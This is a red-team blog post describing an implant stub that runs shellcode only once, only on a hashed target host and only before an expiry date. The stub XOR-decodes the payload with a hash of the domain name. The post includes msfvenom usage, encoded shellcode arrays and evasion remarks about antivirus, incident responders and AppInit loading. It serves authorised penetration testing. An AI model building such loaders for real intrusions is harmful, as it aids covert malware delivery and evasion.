Safer Shellcode Implants

Overview

Almost all simulated attacks will require, at some point, the installation of a RAT and the establishment of a command and control (C2) channel. Unless you use your own custom RAT, you have limited control over the code that you use; for example publicly available options include:

Empire - https://github.com/PowerShellEmpire/Empire
Meterpreter - https://www.metasploit.com/
Cobalt Strike - https://www.cobaltstrike.com/
Pupy - https://github.com/n1nj4sec/pupy
Throwback - https://github.com/silentbreaksec/Throwback

There are three features that I have been looking for:

A check to only allow the implant to run once (either per user or globally).
Validation that the implant is being executed on the correct host or a host within scope.
A check to ensure that the implant is not executed after a certain time (i.e. the end of the engagement).

I have considered this primarily from a persistence perspective but this could equally be applied to code that is executed in order to gain a foothold on the network. This post is written on the assumption that you have generated raw shellcode and wish to add the above functionality to it without rewriting the shellcode. I am aware that some RATs offer some of the above.

All source code is available at https://github.com/stufus/shellcode-implant-stub.

Single Execution

The simplest way of determining whether the implant is already running is to use a mutex; this general purpose is exactly what they are designed for. Mutexes in Windows can be created in the local namespace (effectively per user) or the global namespace (per system). Therefore, the code could:

Attempt to open a mutex called MWR-STUFUS-Implant.
If the mutex exists, quit.
If the mutex does not exist, create it and run the shellcode.
When the owning process exits, the mutex will also be cleared.

If the mutex name is prefixed with Local\, it will be created in the local namespace (effectively per user). If the mutex name is prefixed with Global\, it will be in the global namespace and therefore accessible to everything running on the host, even as other users. Therefore, a local mutex can be used to ensure that the implant does not execute if it is already running as that user. A global mutex can be used to ensure that the implant does not execute if it is already running on the system. The prompt for this project was a desire to create an implant DLL that could be executed using the AppInit system; AppInit DLLs are loaded during the DLL_PROCESS_ATTACH process of User32.dll. An implant that can be placed there will be loaded into almost every application which loads User32.dll, which is most of them, and could result in the implant code being executed thousands of times simultaneously if not checked.

Endpoint Validation

Although some publicly available or commercial tools do not support this, it is important on a targeted attack to ensure that only the client is compromised. One of the methods of doing this is to hardcode certain client-specific identifiers into the implant to prevent execution on unauthorised systems. The technique that I have chosen has the side effect of being slightly more complex to reverse-engineer and is less likely to be detected by signature-based antivirus tools because of its custom nature. However, the primary purpose of this project is not to evade AV software, but to offer a solution to those who wish to promote implant safety but have not coded their own implants from scratch. However, the nature of these checks do have the advantage of disguising the true purpose of the implant which is an obvious benefit. I am hoping that this will help other attack simulation teams in the industry to develop safer implants and that it will also raise awareness amongst defensive teams to ensure that they can react to customised binaries. Those who have licenced versions of Cobalt Strike could also customise one of the artifact kits to include these techniques and anyone can create customised templates for Metasploit.

Method

There are a number of ways of representing client specific information within the implant and I have discussed and demonstrated two possible options below.

Static Check

The simplest way of ensuring that the code does not execute on an unauthorised host is to hard-code a host or network specific identifier in the binary and compare this value at runtime to the hardcoded value. The immediate issue with this approach is that it would be trivial to identify the intended target should the binary be acquired by a third party, which could draw their attention to the existence of the simulated attack. A safer approach is to store a hash instead of the raw data. For example, the following pseudo-code could be used to ensure that the implant only runs on the host MWR1.

$correct_name = "<sha1 of MWR1>"
$current_name = sha1(GetComputerName())
if ($correct_name == $current_name) {
execute_shellcode()
} else {
exit()
}

The benefit of this approach is that it is very quick and effective. A variation could be applied if the hosts follow a known pattern (e.g. hash the first few characters), or multiple criteria could be applied such as the IP range, domain name, Windows owner etc.

Runtime Decoding

Another option is to encrypt or encode the raw shellcode with a piece of information which is known at the time of creation and is available at runtime. This has the advantage that an unconnected third party who received the implant would struggle to identify its true functionality because they would have no idea whether the shellcode had been decoded correctly; execution would obviously fail too. It would also frustrate incident response teams or analysis teams because the implant would likely behave differently on their analysis systems. It would not defeat them but could be advantageous in that it would emulate a more advanced RAT without having to recreate customised position-independent shellcode from scratch. In this example, assume that the domain name (e.g. STUFUS) has been hashed using SHA1 and the resultant 20-byte hash (concatenated with itself multiple times if necessary) has been XOR'd with the shellcode in a manner not unlike a one time pad cryptographic operation in mechanism. The following pseudo-code illustrates an example of this:

$encoded_shellcode = "\xAA\xBB\xCC\xDD\xEE\xFF"
$decoded_shellcode = ""
$decode_hash = GetCurrentDomain()
$decode_hash = RepeatHash($decode_hash) /* If the hash was "\x11\x22\x33", return "\x11\x22\x33\x11\x22\x33" so that it is the same length as the shellcode */
for ($i = 0; $i < length($encoded_shellcode); $i++) {
/* XOR the shellcode with the hash of the current domain */
$decoded_shellcode = $encoded_shellcode[i] ^ $decode_hash[i]
}
$decoded_shellcode() /* Now run the shellcode in whatever state its in */

Expiry Time

This is a straightforward check; the simplest method is to retrieve the current year and month and ensure that they do not exceed the end of the engagement. The following simple pseudo-code would ensure that the code can only execute between 1st January 2016 and 31st July 2016. Obviously the day and time can also be included for more granular control if this is needed.

$year = GetCurrentYear()
$month = GetCurrentMonth()

if ($year==2016 && $month>=1 && $month<=7) {
...
} else {
exit()
}

Implementation

I initially implemented this in Win32 Assembly language using MASM32, and subsequently rewrote this in C. These two implementations are separate and have subtle differences, and I have discussed each one independently. Personally I prefer and use the assembly version. All source code is available at https://github.com/stufus/shellcode-implant-stub.

Win32 Assembly (MASM)

The barrier to entry when coding using MASM's high level syntax is nowhere near as high as you may imagine. Although you do need to understand assembly language, the macros and syntax that it supports do make the code a lot clearer and, where I can, I have used this syntax in order to keep the code as clear as possible. I have commented the code in some detail and hope that the combination of this narrative and the commented code will be enough.

Some of the best tutorials I found online are Iczelion's Win32 assembly tutorials, accessible at http://win32assembly.programminghorizon.com/tutorials.html. He has done some amazing work with MASM including Code Snippet Creator (accessible at http://win32assembly.programminghorizon.com/source1.html) which is a tool for manipulating PE files written entirely in Win32 assembly. I remember talking to him about it on EFNet about 15 years ago; its a tool for injecting assembly code into another EXE and sorting out the sections, alignment and relocation. That particular tool may seem a little manual by today's standards and you may want to change a couple of constants in the source code, but I still think its a very clever tool.

If you're interested in Win32 assembly, you could learn a lot from him. I certainly did.

Compiling

The Microsoft Assembler (MASM) is available for download for free at http://www.masm32.com/. It contains an installer and a number of libraries. For the rest of this article, I shall assume that you have installed it in C:\MASM32. The source code can be found in the \stub-masm-exe directory, and compiling it is as simple as executing makeit.bat. This should generate a console window containing output not unlike the below:

Microsoft (R) Macro Assembler Version 6.14.8444
Copyright (C) Microsoft Corp 1981-1997. All rights reserved.

Assembling: stub-exe.asm

***********
ASCII build
***********

Volume in drive G is STUFUS
Volume Serial Number is 344C-D851

Directory of G:\shellcode-implant-stub\stub-masm-exe

19/03/2016 19:24 14,129 stub-exe.asm
29/03/2016 20:27 2,475 stub-exe.obj
29/03/2016 20:27 2,560 stub-exe.exe
3 File(s) 19,164 bytes
0 Dir(s) 400,551,542,784 bytes free
Press any key to continue . . .

Customisation

The .data section can be considered to be the home of the global initialised variables. There are a few strings that are defined and I have left a testing messagebox payload in there as an example. I have also written a python script (raw2src.py) to convert raw shellcode to MASM and C's format; I have explained this further in the example below. The CheckExecution() function is the main function to read through; simply comment out any checks that you do not want to perform. It currently performs the following actions in the following order:

Checks that the current date is within the hardcoded limit (i.e. between January 2016 and July 2016 inclusive) and exits if not.
Checks that a SHA1 hash of the NetBIOS local host name matches the stored hash.
Checks whether the implant is already running and exits if so. The example uses a local mutex named Stufus; this has the effect of running once per session (in most cases, once per user).
Obtain a SHA1 hash of the domain name and XOR the stored shellcode against that name.
Run the shellcode.

C (Visual Studio)

For consistency, the CheckExecution() function is the main function in terms of invoking the various checks that have been discussed above. It currently performs the following actions in the following order:

Checks that the current date is within the hardcoded limit and exits if not.
Checks that a SHA1 hash of the NetBIOS local host name matches the stored hash.
Checks whether the implant is already running and exits if so. The example uses a global mutex named STUFUS; if this is present (i.e. the mutex is visible to all processes regardless of user), it will exit.
Obtain a SHA1 hash of the domain name and XOR the stored shellcode against that name.
Run the shellcode.

The flowchart below illustrates this process:

Example

In order to demonstrate this, the windows/messagebox payload from meterpreter will be used because it is both safe and visual. However, this could easily be replaced with meterpreter, beacon or any other raw payload of your choice.

Generate the raw shellcode

$ msfvenom -p windows/messagebox -f raw -o example-messagebox.raw TITLE="MWR Labs / @ukstufus" ICON=INFO TEXT="The payload has executed"
No platform was selected, choosing Msf::Module::Platform::Windows from the payload
No Arch selected, selecting Arch: x86 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 297 bytes
Saved as: example-messagebox.raw

Collect information from the target system

I have put together a very basic Powershell script (GetComputerInfo.ps1) which performs a small number of WMI calls to dump information relating to localhost; these could be considered a starting point for host-specific or client-specific identifiers.

Windows PowerShell
Copyright (C) 2014 Microsoft Corporation. All rights reserved.

PS G:\shellcode-implant-stub> import-module .\GetComputerInfo.ps1
PS G:\shellcode-implant-stub> GetComputerInfo

Domain : stufus.mwr
Manufacturer : innotek GmbH
Model : VirtualBox
Name : TESTER
PrimaryOwnerName : Stuart
TotalPhysicalMemory : 1073270784

SystemDirectory : C:\Windows\system32
Organization :
BuildNumber : 9600
RegisteredUser : Stuart
Version : 6.3.9600

SMBIOSBIOSVersion : VirtualBox
Manufacturer : innotek GmbH
Name : Default System BIOS
SerialNumber : 0
Version : VBOX - 1

Caption : Intel64 Family 6 Model 58 Stepping 9
DeviceID : CPU0
Manufacturer : GenuineIntel
MaxClockSpeed : 2395
Name : Intel(R) Core(TM) i7-3630QM CPU @ 2.40GHz
SocketDesignation :

Manufacturer : Oracle Corporation
Model :
Name : Base Board
SerialNumber : 0
SKU :
Product : VirtualBox

There are far more options available, and I will leave it to you to choose attributes that are both practical and consistent across your target. For the purposes of this example, we will hardcode the computer name hash (TESTER) and use a hash of the domain name (stufus.mwr) to decode the raw shellcode.

Generate custom shellcode buffers

Regardless of whether the ASM or C route is chosen, the raw shellcode will need to be XOR'd and refactored so that it can be included in the project source code. For those unfamiliar with XOR, it has two interesting properties. If "(A xor B) = C" then "(B xor C) = A" and "(A xor C) = B". The other property of XOR which is useful for cryptography is that if you XOR a value with something which is random, the output that you get will be random too (i.e. an equal probability of being 0 or 1); this is easily provable. Therefore, if we XOR the shellcode with a known value (the hash of the domain), and then XOR the result with the same hash, we will get the shellcode back. We also need to generate the hash of TESTER to store in the source code and I have written a python tool which does this:

$ ./raw2src.py -h
usage: raw2src.py [-h] [-c COMPUTERNAME] [-x XOR] [-s SHELLCODE]
[-o OUTPUTFORMAT]

Shellcode to C/ASM implant stub converter.

optional arguments:
-h, --help show this help message and exit
-c COMPUTERNAME, --computername COMPUTERNAME
Generate the SHA1 hash of the parameter given (e.g. a
computer name)
-x XOR, --xor XOR XOR the shellcode with the hash of the parameter given
(e.g. domain name)
-s SHELLCODE, --shellcode SHELLCODE
The filename containing the shellcode.
-o OUTPUTFORMAT, --outputformat OUTPUTFORMAT
The output format. Can be "C" or "MASM"

For this example, we know that:

The shellcode is in example-messagebox.raw
The name of the host is TESTER and we want to store the hash of TESTER for later comparison
The name of the the domain to which the host is attached is stufus.mwr, and we want to XOR the shellcode against the hash of stufus.mwr
The syntax for C is different to the syntax for ASM

MASM

The code below will generate the above and format the result for compilation by MASM. Cut and paste it into the.data section of stub-exe.asm.

$ ./raw2src.py -c TESTER -x stufus.lan -s example-messagebox.raw -o MASM
; This is the hash of: TESTER
hashSHA1ComputerName db 83,143,104,249,44,163,118,229,35,230,214,169,104,99,222,2,125,118,163,218
hashSHA1ComputerNamelen equ 20

; Shellcode loaded from: example-messagebox.raw
; Shellcode XOR'd with hash of: stufus.lan
shellcode db 160,36,44,190,11,202,219,101,31,23,99,245,102,134,176,9,178,77,78,81
db 242,185,171,236,57,230,164,42,237,46,34,252,224,250,78,139,219,199,233,162
db 152,175,60,11,91,202,164,17,241,46,64,236,215,227,209,243,200,222,179,7
db 89,206,92,132,75,167,164,96,70,164,250,245,80,211,251,132,46,66,248,41
db 126,14,120,106,126,41,196,160,246,217,48,236,218,3,176,34,166,199,211,59
db 242,195,252,236,37,242,46,191,70,161,159,197,71,107,127,92,158,167,251,239
db 113,230,99,238,154,103,237,60,67,235,26,40,253,10,164,135,125,57,177,24
db 125,116,201,191,157,157,168,72,233,247,252,74,80,29,196,241,199,206,80,49
db 21,239,246,15,76,220,1,48,165,208,103,161,221,210,224,240,222,226,50,212
db 159,153,72,50,123,103,237,4,118,13,182,137,19,101,39,92,208,46,103,162
db 134,48,223,63,95,206,15,60,184,195,97,183,199,151,80,11,246,174,24,114
db 89,143,223,43,30,140,92,60,128,242,70,228,158,57,179,36,166,210,177,190
db 17,151,151,71,95,134,90,32,168,193,124,161,215,135,88,16,234,167,75,125
db 17,160,214,3,95,134,95,53,180,201,124,144,199,135,27,73,75,78,116,121
db 97,70,86,86,173,188,124,5,159,90,196,245,111,178,196,45,138
shellcodelen equ 297

C

The code below can be cut and pasted into config.h.

$ ./raw2src.py -c TESTER -x stufus.lan -s example-messagebox.raw -o C
// This is the hash of: TESTER
BYTE hashSHA1ComputerName[] =
"\x53\x8f\x68\xf9\x2c\xa3\x76\xe5\x23\xe6\xd6\xa9\x68\x63\xde\x02\x7d\x76\xa3\xda";
#define hashSHA1ComputerNamelen 20

// Shellcode loaded from: example-messagebox.raw
// Shellcode XOR'd with hash of: stufus.lan
BYTE shellcode[] =
"\xa0\x24\x2c\xbe\x0b\xca\xdb\x65\x1f\x17\x63\xf5\x66\x86\xb0\x09\xb2\x4d\x4e\x51"
"\xf2\xb9\xab\xec\x39\xe6\xa4\x2a\xed\x2e\x22\xfc\xe0\xfa\x4e\x8b\xdb\xc7\xe9\xa2"
"\x98\xaf\x3c\x0b\x5b\xca\xa4\x11\xf1\x2e\x40\xec\xd7\xe3\xd1\xf3\xc8\xde\xb3\x07"
"\x59\xce\x5c\x84\x4b\xa7\xa4\x60\x46\xa4\xfa\xf5\x50\xd3\xfb\x84\x2e\x42\xf8\x29"
"\x7e\x0e\x78\x6a\x7e\x29\xc4\xa0\xf6\xd9\x30\xec\xda\x03\xb0\x22\xa6\xc7\xd3\x3b"
"\xf2\xc3\xfc\xec\x25\xf2\x2e\xbf\x46\xa1\x9f\xc5\x47\x6b\x7f\x5c\x9e\xa7\xfb\xef"
"\x71\xe6\x63\xee\x9a\x67\xed\x3c\x43\xeb\x1a\x28\xfd\x0a\xa4\x87\x7d\x39\xb1\x18"
"\x7d\x74\xc9\xbf\x9d\x9d\xa8\x48\xe9\xf7\xfc\x4a\x50\x1d\xc4\xf1\xc7\xce\x50\x31"
"\x15\xef\xf6\x0f\x4c\xdc\x01\x30\xa5\xd0\x67\xa1\xdd\xd2\xe0\xf0\xde\xe2\x32\xd4"
"\x9f\x99\x48\x32\x7b\x67\xed\x04\x76\x0d\xb6\x89\x13\x65\x27\x5c\xd0\x2e\x67\xa2"
"\x86\x30\xdf\x3f\x5f\xce\x0f\x3c\xb8\xc3\x61\xb7\xc7\x97\x50\x0b\xf6\xae\x18\x72"
"\x59\x8f\xdf\x2b\x1e\x8c\x5c\x3c\x80\xf2\x46\xe4\x9e\x39\xb3\x24\xa6\xd2\xb1\xbe"
"\x11\x97\x97\x47\x5f\x86\x5a\x20\xa8\xc1\x7c\xa1\xd7\x87\x58\x10\xea\xa7\x4b\x7d"
"\x11\xa0\xd6\x03\x5f\x86\x5f\x35\xb4\xc9\x7c\x90\xc7\x87\x1b\x49\x4b\x4e\x74\x79"
"\x61\x46\x56\x56\xad\xbc\x7c\x05\x9f\x5a\xc4\xf5\x6f\xb2\xc4\x2d\x8a";
#define shellcodelen 297

Compile the project

Either use Visual Studio (C) or run makeit.bat (ASM) to generate the compiled binary. This can then be tested or executed on the target system.

Limitations & Further Work

Some techniques rely on the real payload executing in the same process and not (for example) spawning another process and then exiting the parent one; obviously the mutex check will not be effective once the wrapper process exits. There is also the obligatory criticism of hash function choices; for example, perhaps SHA512 or Keccak (SHA3-512) would be a better hashing algorithm choice, especially because it may negate the need to replicate and concatenate the hashes if the hash is large enough and the target shellcode is small enough. SHA1 is more than good enough for this purpose though.

There are numerous ways that this project can be extended; additional host indicators could be added or chained together, additional functionality could be introduced (for example, automatic persistence if the code is confident that this is a target system), the introduction of a 'kill switch' (e.g. withdrawal of a specific file or the introduction of one) etc.

I will at a later date, commit a DLL and Windows Service version of the above code in assembly language, which can be adapted for techniques such as AppInit loading. However I would encourage all readers to develop this in their own direction and to contribute ideas and functionality back if able to do so.